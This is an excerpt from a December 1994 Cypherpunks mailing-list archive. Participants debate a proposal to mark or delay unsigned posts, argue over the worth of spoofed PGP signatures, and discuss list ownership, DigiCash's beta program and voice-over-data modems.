09:32:20 -0700 (PDT), Syed Yusuf wrote: >in all this discussion about how well it would work and ways around it, >I think I've missed the problem that people are trying to solve. > >isn't it ironic that privacy advocates are suggesting manditory >loss of anonimity (which is what forced signing is). Such is certainly not the case for everyone. I don't see that I lose any anonymity by signing MY messages. I regard it for the most part as a necessary evil inherent in maintaining a stable, reputable pseudonymous persona. I sign everything I mail or post so that eventually individuals who've become familiar with this identity will suspect a spoof if they see something to which my nym is attached but not my digital signature. To be frank, it's something of a chore for me to sign everything. I do it because there's a good reason for me to do so. N. Cognito =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= N. Cognito "Don't put no constrictions on da people. an234 at vox.xs4all.nl Leave 'em ta hell alone." -- J. Durante =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= public key available via keyserver -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt4hx6L3ipYu3mvVAQGaYwQAg/cKHs4RKYEQ1tx5YDQrGUeIeXSe2G+t xJCh1vKzVYB6VjwVH2MrwyfJXtvXvdVbco2X6xx2KJxpwY1r1WRgYSOsbtehMleg 24a1ukcycYe+lgNn62PEEbxw9zGbL4unHaWLkiFkyzPknSlZSNfBBsQpp11UGmnG FCVg3SidPlE= =gg74 -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 11:36:31 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:36:31 PST Subject: The Market for Crypto--A Curmudgeon's View In-Reply-To: Message-ID: <199412012035.MAA13598@largo.remailer.net> From: abostick at netcom.com (Alan Bostick) Yes, but you are denying the way in which delaying, like bouncing, actively interferes with the timely forwarding of non-signers' messages, while merely marking them is a more passive form of harrassment. A delay for one minute (assuming notice for the delay) is hardly different than notification only. A delay for a month is hardly different than a bounce. Not all delays are the same. They cannot be analyzed as a single category but are better analyzed with respect to the characteristic time scales of the discussion. You keep insisting that delaying unsigned messages does not interfere with non-signers' abilities to participate in the discussion. I say you are wrong. It's a positive hindrance. This is statement is true for large delays and false for small ones. The interesting issue to me is where a boundary might lie. (Are you going to make sure that all the signatures are valid, or will you accept someone sticking a PGP signature into their .sig and using it over and over?) At first, it would just be a recognizer for syntax, but at both ends. A second effort might actually hash the message but not bother with the signature itself. The second effort would require almost all the processing involved in a real signature and require the same architecture. It would not, however, be subject to the key distribution problem that I don't want to make a prerequisite. It occurs to me that a format with just a hash might be generally useful against random data corruption, and not just a workaround hack. Eric From eric at remailer.net Thu Dec 1 11:40:47 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:40:47 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412010805.AAA27330@netcom16.netcom.com> Message-ID: <199412012039.MAA13614@largo.remailer.net> From: jamesd at netcom.com (James A. Donald) -----BEGIN PGP SIGNED MESSAGE----- A checker that merely checks if a signature looks like a signature merely makes cryptography look stupid, like a power ranger suit. Well, the message you posted doesn't look like a PGP signature. It has similarities, but wouldn't pass the recognizer. As I've said before, there is partial benefit to an incomplete recognizer. I do not want to abandon this benefit merely because others are more difficult to obtain. I don't understand why a recognizer set up at a single location makes all cryptography look stupid. Eric From eric at remailer.net Thu Dec 1 11:57:04 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 11:57:04 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412010957.BAA23404@netcom3.netcom.com> Message-ID: <199412012055.MAA13646@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) More that just making crypto look stupid, [... it] defeats the whole purpose of user-to-user verfication. Solutions that are bottom up are fine so long as they're not required to remain on the bottom. If a service (not the one I'm proposing) were to actually verify sigs, then some people might want to trust it and some might not, depending on their desires and abilities. I'm interested in systems which actually allow me to _really verify_ sigs if I have to [...] And so am I. There is less incentive, however, to set up a sig checker when there are few signatures to check. I don't think we need the whole crypto world to come into bloom at once. In fact, I don't that _could_ happen and that expecting that sort of parallel development is a positive hindrance to deployment. I wasn't kidding earlier today (apologies that I'm reading the later mail first, as I just got home) when I argued that toad messages ought to be signed. That is, all traffic from toad. I didn't think you were kidding, nor did I think that the PGP deficiency you pointed out was trivial. There have been major issues about trustability at toad.com and it is inappropriate at the current time to consider trusting signatures it might make. Again, I don't feel that this problem needs to be solved in order to encourage people to use digital signatures. If sigs are to be compelled [or bounced ...], then such sigs should *actually be checked*, with the resulting checked messages then signed by toad/Eric/Hugh/John/whatever. There is some merit to this idea, assuming that signatures are to be used as access control. The current proposal, however, does not include that and hence the argument above is premature. I'd like to examine it later at some point when it is more timely. In the interim, though, I leave with an open question: "What would such a server signature represent?" Anything less than this is actually counterproductive, as it fosters a non-Cypherpunkish view of placing trust in others to do what technology allows one to do directly. Another non-Cypherpunkish view is to prevent the creation of systems which allow you to use an agency relation to let someone else do something for you. For reading cypherpunks mail on a slow machine, or someone else's machine, I'd be glad to use an agent (the legal denotation here) to verify signatures. What is definitely non-Cypherpunkish is to promote systems that require trust relations that would not be entered into freely, like the first PEM certificate mechanism. Eric From eric at remailer.net Thu Dec 1 12:00:00 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 12:00:00 PST Subject: Effects of Marking/Delaying Nonsigned Posts In-Reply-To: <199412011128.DAA27458@netcom3.netcom.com> Message-ID: <199412012058.MAA13655@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) Eric Hughes wrote: > This afternoon I considered starting the initial delay at one minute > and incrementing the delay by one minute each time a message gets > delayed. The counter would be global to the server, not local to each user. A concrete basis for comment. You'll likely want to comment again, though. Eric From eric at remailer.net Thu Dec 1 12:04:55 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 12:04:55 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412011142.DAA28100@netcom3.netcom.com> Message-ID: <199412012103.NAA13673@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) > I apply Tim's Calvinist Stoicism stance to this situation. Put > crudely, if people bolt at the first sign of encroachment, fuck 'em. Indeed. But if my messages are bounced or delayed excessively, I will of course have no reason to remain. My own Calvinist Stoicism. I would not say that bounces or long delays were a first sign of encroachment. But it does seem that we have not been addressing the same idea. > To reiterate, I am willing to use my > position to send a stronger message. Bluntly, Eric, this is what is so disturbing about your position. You are willing to "use your position" to essentially purge the list Again, I've not been speaking of this end result, except insofar of a desire to avoid it. [re: special small keys for low security applications] I don't buy this, and hence will have my messages delayed or bounced. I want my key to be useful for real uses, not just "Power Ranger" (a la James Donald) uses. It appears then, that we disagree about the value of a half solution. Eric From rishab at dxm.ernet.in Thu Dec 1 12:06:02 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Thu, 1 Dec 94 12:06:02 PST Subject: Eric go ahead; Cpunks start Cpunking again Message-ID: Good grief! At >500 k, this is the longest 10% thread (SNR 1:10) I've seen in ages. Eric please go ahead and add the X-Bozo: header field, we can do another in-depth study on its effects in 3 months, while Tim, you, and I figure out how to make digisigs convenient for ourselves. (After all, Eric might not own the 'Cypherpunks list' whatever that is, but he does own cypherpunks at toad.com; we could all move elsewhere, except that despite a few crashes I've found this one especially reliable.) In the meanwhile, could we get back to cryptography? There are so many interesting things happening out there - good earnest tough-on-crime Congressmen waiting to sign HR 5199 (the Clipper Bill); the DigiCash trial; the great voice-over-data protocols and products introduced by Intel, Rockwell, ZyXEL and others at Comdex which will make Voice-PGP so much easier (ZyXEL 2864 does V.34 28.8kbps, voice, fax/data simultaneously, 230kbps DTE, parallel port to print faxes on printer when computer is off, $350). Now what _I_ want is some way to integrate PGP with Netscape... Rishab ObEconomistPlug: British judges ruled against a Liberal Democrat Party request to re-run elections where the "Literal Democrats" won 10,000 votes. The new Conversatives will target Tory seats next year. How about a good Cypherpunk Senator ... from the Rebuplican party? ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "Clean the air! clean the sky! wash the wind! rishab at dxm.ernet.in take stone from stone and wash them..." rishab at arbornet.org Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From tcmay at netcom.com Thu Dec 1 12:06:03 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 12:06:03 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412011917.LAA13408@largo.remailer.net> Message-ID: <199412012005.MAA29251@netcom4.netcom.com> Eric Hughes wrote: > > From: tcmay at netcom.com (Timothy C. May) > > I haven't said I plan to leave the list. I've said that if my posts > are blocked/bounced/rejected, I would likely choose not to remain. > > Let me ask something more proximate. > > Tim, if the server puts a header on mail that identifies it as unsigned, > how will you feel about seeing your mail marked as such? What might > you do about such a situation? I won't do anything. I might not even notice it. I've never felt that this was important, though I also think it's pretty much useless (as it's so obvious who's at least making the appearance of signing). Delays of hours or more would affect my participation on the list. Bounces of course would. Those have been my concerns. On the rest of Eric's message, I'm in agreement with his assesment. I'll elide liberally and only comment on a few points: > Let the world know that there would be no cypherpunks without both Tim > May and me. Tim and I met at a party at Hugh Daniel's place; we were ... All of this is as I remember it. ... > the mailing list, and with this was a symmetry breaking. As many of > you know, I spent hours and hours and hours doing mailing list > maintenance (adding and deleting by hand) and dealing with all of the > problems. I don't spend so much time on that anymore because of > majordomo, but I still do deal with the bounces and the complaints and > the exceptional requests. Agreed. It was a symmetry breaking and Eric is justly rembembered as being the driving force behind the mailing list. My issue is with the views that are long the lines of "It's Eric's list, and if he says we can only write about Croatian youth hostels, well, hey, it's _his_ list!" "The map is not the territory," as a famous reverse Polish logician said, and "the list is not the group." Nor is the Cause, the Movement, etc. The mailing list is the preferred forum in cyberspace for discussing things amongst ourselves. > Now we must shift subjects. What good is assigning credit if no use > can be made of it? Many substitutes are available for obtaining a > good feeling. Social position allows one to influence the world. One > of the most valuable abilities in the world is the ability to get > people to listen to you. This is not new, merely highlighted by the > collapse-generating properties of computer networks. Tim and I and > many others have spent much time devoted to writing clearly enough > that we will be listened to preferentially, both for clarity itself > and for the anticipation of clarity. Well said. > "Actions speak louder than words" is true for local politics as well > as global. Both Tim and I yammer a lot, but I do the list work. The > assymetry is not incidental. In discussing potential server actions, > I do not feel constrained come to agreement with any single voice, > including Tim. I have a lot of respect for Tim and with respect to > cypherpunks generally I try not to put myself above him, but with > respect to the technical underpinnings of the list I feel no such > constraint. This difference is a long consequence of actions chosen > by both parties. I've never proposed a majority vote, or even an "advisory vote" of some body. I've just said, in various forms, that compulsory signing (or compulsory-anything), with delays or bounces, will have certain negative effects, on me, on others, and perhaps on the list as a whole. I've made no "propertarian" or "labor-mingling" arguments, contrary to the views of some, just these opinions of wisdom. > Now, Tim, I don't know exactly that you feel slighted in this debate > with respect to origins and their values, but I suspect that you do. > If so, I regret that, but ask you to, well, deal with it. Symmetry is > broken, cypherpunks is no longer new, and we who appeared > interchangeable to the world two years ago now seem different. I don't feel slighted, not that that would matter. It just sticks in my craw that some folks here are apparently so eager to adopt a position of blind obedience, of alpha male subservience. I'd feel just about as strange (I hope) if people were saying "Look, Tim's the boss. He's the Big Kahuna. If you don't like his policies on his list, leave." Clearer? --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From eric at remailer.net Thu Dec 1 12:08:20 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 12:08:20 PST Subject: WHAT THE.. (was: Manditory key sig.. In-Reply-To: Message-ID: <199412012107.NAA13695@largo.remailer.net> From: Syed Yusuf in all this discussion about how well it would work and ways around it, I think I've missed the problem that people are trying to solve. I want more people to actually use cryptography. I don't phrase it as a problem, with it's implicit value judgement, but rather as what I want. isn't it ironic that privacy advocates are suggesting manditory loss of anonimity (which is what forced signing is). The first appearance of a key is anonymous. The second and later are pseudonymous. Even mandatory signing (which is not what is being proposed) does not eliminate anonymity. Eric From dcwill at python.ee.unr.edu Thu Dec 1 12:13:18 1994 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Thu, 1 Dec 94 12:13:18 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412011950.LAA13468@largo.remailer.net> Message-ID: <199412012011.MAA09700@python> ------------BEGIN DIGITALLY SIGNED MESSAGE------------------ >From Eric Hughes: > > To someone who doesn't know what a digital signature is at all, it > doesn't matter if it's real or faked. Communication to these people > is entirely from the odd-looking form of the appendages. I would prefer to teach fewer of them to speak than teach a larger number of them to grunt. > I advocate partial progress, and the lack > of a benefit is not sufficient argument against things that actually > work. I believe that your definition of what works and what doesn't may be very different from mine. Spoofing sigs doesn't qualify as something that "works" in my book. Maybe banks should start paying high quality forged checks because some effort has been expended in their creation. > If you don't have a public key, it doesn't matter if the signature was > real or faked; you still can't verify it. No, but if the message is sufficiently important to you, some genuine productive effort can be expended to acquire the public key and verify the message. I only bother to verify sigs on messages where authenticity matters, and I suspect that most others follow the same guideline. A bogus signature is, of course, unverifiable. Why waste effort requiring something as non-functional as a spoofed signature? > One of the purposes of this proposal is to encourage people to change > their software to automatically sign. Why? Even AOlers can make a bogus sig as a .sig file and attach it to every outgoing message. Does this even come close to teaching people how to use _real_ dig sigs? I don't think so. What's the benefit of teaching and encouraging people to do the wrong thing? > The benefit I want more, of the two, is > the automaticity. If, for whatever reason, actual signing can't > happen, I am content with the form of a signature. Then the vast majority of grunters will put a spoof in their .sig files and be "done" with crypto. If you see that as serving some higher purpose, then you and I will never agree on this issue. > That's fine, and I agree with the idea as a solution to the insecurity > of keys on a public machine. I do not, however, feel I need to insist > that everyone do this. Rather than insist that people be forced down any specific path, they should be encouraged to use proper forms of digital authentication. I thought that was your original goal, and I'm disappointed that your original objective has been compromised by an "automatic-spoof-is-good -enough" clause. > 1. Crypto-unaware people will see the form and ask what it is. "Aww, that some kind of gibberish I had to include so my post would go through without being delayed. It really doesn't mean or do anything. Last week, I didn't know nothin' about crypto . . ." > 2. Crypto-aware people will alter their software to do something > automatically. In vi, type :r .sig and suddenly, the following pops up: Beavis at butthead.biteme.edu --------BEGIN BFD SIGNATURE------- GyGYTv%c4u68998*7tvv5c4%$ex3xc$%ec^%^&tb*&b98&YN8(MN})]mn*&b87Tyv5r8 BN8&b987y*&%Rc5$X4523W5-9}]{)([]0NP89YB67&C$Ec4ex$#xw%^v90-*U-m9_0987V ---------END BFD SIGNATURE-------- Automagically! And much easier than actually bothering to learn something really useful. > 2a. Many, perhaps most, of these people will use real crypto once > auto-something already set up. Not if they don't need to really get or use it. If your proposal required something more that a shoddy spoof, it _would_ have a lot of merit. But anyone can append a dig sig without even knowing how to spell PGP. That's where your good idea is derailed. I fail to see any good that can flow from compelling people to do something stupid. If you're committed to the Real Thing, herd the cats into the place they really belong instead of letting them decide where to go and later claiming that that was where you wanted them to go all along. =D.C. Williams -------------HERE'S MY DIGITAL SIGNATURE:----------------------- ___ ___ __ , _ __ (| \ ,_ (| \ / () (| | |_/o |\ |\ o _, , /|/ \ / () _| |/ | _| || | | | | |/ |/ | / | /|/|/| / \_ |__/ >- (/\__/ |/o (/\__/o \__/o \/ \/ |/|_/|_/|/\/|_/ | | |_/\_/o | o\__/o --------------PRETTY COOL, HUH? ------------------------------- From rfb at lehman.com Thu Dec 1 12:38:46 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Thu, 1 Dec 94 12:38:46 PST Subject: signing messages In-Reply-To: <199411300623.WAA03988@netcom11.netcom.com> Message-ID: <9412012036.AA15164@cfdevx1.lehman.com> From: "Timothy C. May" Date: Tue, 29 Nov 1994 22:23:09 -0800 (PST) 1. Only one person has reported to me that they were unable to verify my PGP sig (Lance Cottrell reported this...if others did, maybe their messages haven't gotten through to me)). From this I conclude that few people check PGP sigs. A safer conclusion would be that few people report signature failures, although I suspect that your conclusion is also correct. I noticed that your message's signature failed, but chose not to report it. As I recall, it failed because I didn't have the appropriate key, although I do have your 0x54E7483F key and the key that it appeared to be signed with wasn't available from the MIT key server. I also noticed Bill Stewart's signature failure on Message-Id: <9411300425.AA21554 at anchor.ho.att.com> -- ASCII armor stripping failed. In both cases, I assumed that the sender was trying to spoof the act of signing and I further assumed that you were more careful to match the form of a signed message than Bill was. The fact that you've been doing some spoofing lately only strengthened by sense that this was another gag. Often, but not always, when I see a Bad Signature message I let the sender know about it. Rick From paul at poboy.b17c.ingr.com Thu Dec 1 12:44:42 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 1 Dec 94 12:44:42 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412012005.MAA29251@netcom4.netcom.com> Message-ID: <199412012040.AA05059@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Tim said: > It just sticks in my craw that some folks here are apparently so eager > to adopt a position of blind obedience, of alpha male subservience. > I'd feel just about as strange (I hope) if people were saying "Look, > Tim's the boss. He's the Big Kahuna. If you don't like his policies on > his list, leave." No, not the Big Kahuna-- the Big Mac. (ducking), - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCUAwUBLt40rqfb4pLe9tolAQHgbAP4r4tfCArfLisSSY2BUGbzYOVyesiKM3ML 7xXt6eIirk2OnCjdbFs+ZOJxszvWW7eLxqk0lbDWprJQfeSKBgJc4uz3Yfow8sbs pxrO3adKOj1cgZnotr/8whA0BXK1QhycyEnjV+t+rEZ7qdUTuFvdpSaZ7Oy224uI NwrU6sVMBQ== =ni+J -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 12:45:22 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 12:45:22 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412012005.MAA29251@netcom4.netcom.com> Message-ID: <199412012144.NAA13805@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) [re: reaction to marking] I won't do anything. I might not even notice it. I've never felt that this was important, though I also think it's pretty much useless (as it's so obvious who's at least making the appearance of signing). I'm thinking of using something real obvious as a marker, similar in spirit to what I posted the other day: X-Advocacy: Eric Hughes wants YOU to sign your message. I may actually use something very close to this, perhaps with the name instead of the personal pronoun. This header would be attached only to message without recognized signature. [re: reaction to delay] Delays of hours or more would affect my participation on the list. Bounces of course would. Those have been my concerns. I have realized all along that bouncing messages would be extremely disruptive; I apologize to the list if I made that less than clear. As far as specific times, I think the cutover happens somewhere between two and four hours. If delays get used, you can be sure they'll start small and rise slowly. My issue is with the views that are long the lines of "It's Eric's list, and if he says we can only write about Croatian youth hostels, well, hey, it's _his_ list!" I am also far less than persuaded by such arguments. I don't feel slighted, not that that would matter. Well, it would matter to me. But then again, I'd first try to acknowledge any such feelings, and then I'd tell you fuck off if you couldn't deal with reality. But Hey! that just me, I suppose. I'd feel just about as strange (I hope) if people were saying "Look, Tim's the boss. He's the Big Kahuna. If you don't like his policies on his list, leave." "This is one _tasty_ burger" Clearer? Yes, clearer. Fortunately for me, I was locally famous in high school in (drum roll) competitive classics. I experienced some of exactly the kind of subservience accorded to famous people. I developed a distaste for it then, which has not left. I have some understanding of the loneliness of celebrity. When a sycophant doesn't treat you like a peer, there's little point in trying to even out the relationship. It's almost always doomed. Here are Eric's two sentence advice on celebrity. If you want to know famous people, don't treat them differently than others. If they therefore ignore you, leave. Eric From geoffrey at crl.com Thu Dec 1 12:48:08 1994 From: geoffrey at crl.com (Geoffrey Faivre-Malloy) Date: Thu, 1 Dec 94 12:48:08 PST Subject: Eric go ahead; Cpunks start Cpunking again In-Reply-To: Message-ID: On Fri, 2 Dec 1994 rishab at dxm.ernet.in wrote: > > In the meanwhile, could we get back to cryptography? There are so many > interesting things happening out there - good earnest tough-on-crime > Congressmen waiting to sign HR 5199 (the Clipper Bill); the DigiCash trial; DigiCash trial? Tell me more! > the great voice-over-data protocols and products introduced by Intel, Rockwell, > ZyXEL and others at Comdex which will make Voice-PGP so much easier (ZyXEL > 2864 does V.34 28.8kbps, voice, fax/data simultaneously, 230kbps DTE, parallel > port to print faxes on printer when computer is off, $350). Now THAT sounds cool! :) Wonder how long it will be before someone uses PGP in a phone :) How much processing power would it take to do that on the fly anyway? > > Now what _I_ want is some way to integrate PGP with Netscape... What's Netscape? -------------------------------------------------------------------------- | Geoffrey at crl.com The opinions expressed herein may or | | Geoffrey Faivre-Malloy may not be the opinions of my employer.| | Purple Duck Software Like anyone really cares... | -------------------------------------------------------------------------- | Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342 | -------------------------------------------------------------------------- From eric at remailer.net Thu Dec 1 12:52:08 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 12:52:08 PST Subject: recent voice over data In-Reply-To: Message-ID: <199412012150.NAA13820@largo.remailer.net> the great voice-over-data protocols and products introduced by Intel, Rockwell, ZyXEL and others at Comdex which will make Voice-PGP so much easier As I understand these voice-over-data products, the voice goes over analog, added to the modem signal. The modem signal is interpreted, and then reconstructed and subtracted from the incoming signal, leaving voice. Very clever, but insufficient for secure phones. Eric From lmccarth at ducie.cs.umass.edu Thu Dec 1 12:55:37 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 1 Dec 94 12:55:37 PST Subject: Is it happening already ? Message-ID: <199412012056.PAA23759@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- I hope this is not the start of a trend toward meaningless signatures along the lines I mentioned recently. Hal Finney, who commands more respect from me than does anyone else on the list to date, has just started to PGP sign his messages to the list. However, so far they haven't been signed with a key I've been able to locate. AFAIK, he hasn't sent it to the list. Portal does not accept external fingers. I requested "GET Finney" from one of the key servers at MIT, but all I received was the remailer key I had before. Does someone else have Hal's key ? I could send him mail directly, but I'd prefer to get the key from someone else if it's out there (to learn from my mistake), or else raise this issue again if it's deliberately unavailable. - -L. Futplex McCarthy; PGP key by finger or server "Don't say my head was empty, when I had things to hide...." --Men at Work -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt44O2f7YYibNzjpAQFBQwQAuN3BTSjJnZVnWgsu7WUvsw2ZnE336qqy dFJAkfV7Mdfds3+e3uyR4xHR73TG08lq5Scsohq5D7tOshndzyuVmvKKfRIgSifo hOVkIFuSNjM5Gphnbdcao8NccQMAkZ1CMWysqsI9kAQUBHEXHiUgjAtnsHw8pbL9 JW4GJoo3ADk= =8W2C -----END PGP SIGNATURE----- From cfrye at mason1.gmu.edu Thu Dec 1 12:58:18 1994 From: cfrye at mason1.gmu.edu (Curtis D Frye) Date: Thu, 1 Dec 94 12:58:18 PST Subject: Closed Account Message-ID: <9412012058.AA24321@mason1.gmu.edu> ACCOUNT cfrye at mason1.gmu.edu IS NO LONGER AVAILABLE. IF THIS IS A LIST, THEN PLEASE REMOVE THIS ADDRESS. From paul at poboy.b17c.ingr.com Thu Dec 1 13:01:20 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 1 Dec 94 13:01:20 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412011627.IAA14481@jobe.shell.portal.com> Message-ID: <199412012056.AA05724@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- I'm going to tie together two threads on ecash: one here (Hal and Rishab have both mentioned the ecash system test recently) and one from www-buyinfo about scalability. If you dislike ecash, hit 'n' now I'm running one of the prototype shops (http://www.iquest.com/~fairgate), so let me chime in with my e$0.02 of comments. (no, that doesn't mean I'll pay you e$0.02 to read them!) Hal said: > I just figured that I didn't have enough clout for them to bother to > respond to me, but today on the www-buyinfo list, Stefan Brands, who > many think has the best ecash technology available today, posted that he > had had the same experience! Brands himself has still not been given > an opportunity to join the beta test. He did not sound very happy about > this. I was in the same boat-- I sent in several requests, all of which were ignored. After Digicash issued a call for prototype shops, I signed up. WHAM. I immediately started getting mail asking when I'd have my shop ready-- sometimes two or three messages a day. Once I got everything up and running, I didn't hear further from them. Since then, an accident on my WWW server has rendered the e-shop inoperable. I've asked Digicash, in the form of Paul Diniessen, for help reconstructing the bank records. No go. > Of course, it may well be a matter of incompetence rather than insult, > but the net result is the same. The more I see of digicash's lack of > consideration towards their potential customers and important figures like > Brands the more I question whether they have the potential to succeed. The more I deal with Digicash, the better First Virtual looks. My technical preference is for using Brands or Chaum cash; at present, though, there aren't any shipping Brands servers, and the Digicash folks don't seem to be able to get all their socks in one bag. Digicash's system doesn't scale entirely cleanly, but it's Good Enough if there's one central bank which all other banks can use, just as the credit card companies have a central clearinghouse which allows my credit union Visa to be used with merchants whose accounts are at Citibank. The problems with Digicash thus far have been political and business problems, not technical ones. As others have pointed out, network bandwidth and processing CPU are cheap enough to allow multiple banks to communicate cleanly. Real banks already understand how to do this. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt44Xafb4pLe9tolAQH4AgP/U93rIqM73vBYb/wByCjfBDENuYKTSRe4 C4sRzMt6mgFqs/RSeTczA4x8CZi/ytVw5zjN4ApWuWC9BZpnSrHjBxls/pwRwhGB 2OrViy5jVYtlJ+v78JemsZhiKqOBU2bZ0TDWYVmSKcvWN20fG3fri77lKrpMpYT1 feNB7+T+Q1w= =SZ9T -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 13:01:26 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 13:01:26 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412012011.MAA09700@python> Message-ID: <199412012200.OAA13845@largo.remailer.net> From: "Dr. D.C. Williams" I would prefer to teach fewer of them to speak than teach a larger number of them to grunt. I would rather that the fewer speak and that the rest grunt rather than remain silent. A bogus signature is, of course, unverifiable. Why waste effort requiring something as non-functional as a spoofed signature? For the architectural changes that have to be made to do such a thing automatically. Why? Even AOlers can make a bogus sig as a .sig file and attach it to every outgoing message. But this doesn't create even a bogus signature. There's still a line at the top to add. This misunderstanding about what constitutes valid syntax colors your whole argument. Then the vast majority of grunters will put a spoof in their .sig files and be "done" with crypto. .sig spoofing won't work; it's only the bottom half. That's the whole point, is that some active action must be taken, be it once to set up something automatic or many times with each message. In the first case, the automaticity is obtained, a postive benefit of itself. In the second, a value is recalled to mind each time. I'm disappointed that your original objective has been compromised by an "automatic-spoof-is-good -enough" clause. It's not good enough, but it is partial progress. Merely because one technique doesn't accomplish everything is no reason to abandon it. Eric From merriman at metronet.com Thu Dec 1 13:40:36 1994 From: merriman at metronet.com (David K. Merriman) Date: Thu, 1 Dec 94 13:40:36 PST Subject: Closed Account Message-ID: <199412012141.AA06546@metronet.com> Hmmmph. It looks like I'm not the only one getting these things..... Dave Merriman > >ACCOUNT cfrye at mason1.gmu.edu IS NO LONGER AVAILABLE. >IF THIS IS A LIST, THEN PLEASE REMOVE THIS ADDRESS. > >>From owner-cypherpunks at toad.com Thu Dec 1 15:58:04 1994 >Received: from toad.com by relay2.UU.NET with SMTP > id QQxslf15044; Thu, 1 Dec 1994 15:56:42 -0500 >Received: by toad.com id AA03659; Thu, 1 Dec 94 12:55:37 PST >Received: from ducie.cs.umass.edu by toad.com id AA03653; Thu, 1 Dec 94 12:55:31 PST >Received: (from lmccarth at localhost) by ducie.cs.umass.edu (8.6.9/8.6.9) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ id PAA23759 for cypherpunks at toad.com; Thu, 1 Dec 1994 15:56:00 -0500 >From: "L. McCarthy" >Message-Id: <199412012056.PAA23759 at ducie.cs.umass.edu> >Subject: Is it happening already ? >To: cypherpunks at toad.com (Cypherpunks Mailing List) >Date: Thu, 1 Dec 1994 15:55:58 -0500 (EST) >Reply-To: cypherpunks at toad.com (Cypherpunks Mailing List) >X-Mailer: ELM [version 2.4 PL22] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 1204 >Sender: owner-cypherpunks at toad.com >Precedence: bulk - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From mccoy at io.com Thu Dec 1 13:52:09 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 1 Dec 94 13:52:09 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012056.AA05724@poboy.b17c.ingr.com> Message-ID: <199412012151.PAA07927@pentagon.io.com> paul at poboy.b17c.ingr.com (Paul Robichaux) writes: [digicash stuff...] At some point I am going to have to take a look at my NDA with Digicash again and see how much I can say about the reality of some of these things... > > As others have pointed out, > network bandwidth and processing CPU are cheap enough to allow > multiple banks to communicate cleanly. Real banks already understand > how to do this. Wanna bet? You should get into a clearing discussion with Eric sometime (I think that the clearing issue must be one of his favorite things in the world as he has so much to say about it :) Clearing is not only non-trivial, it can be downright ugly. A small system is not incredibly difficult to set up, but a nationwide or global system would be something that would give scores of engineers and designers nightmares for years to come. Things are easy when you talk about your $50 Visa purchase or check, but when you start to deal with clearing big aggregate sums through banks things get real nasty very quickly. In the US we have the Fedwire system and other gifts of the Federal Reserve to prop up a few of the weakest parts of the problem, but it is still a house of cards waiting for the right puff of wind... jim From jrochkin at cs.oberlin.edu 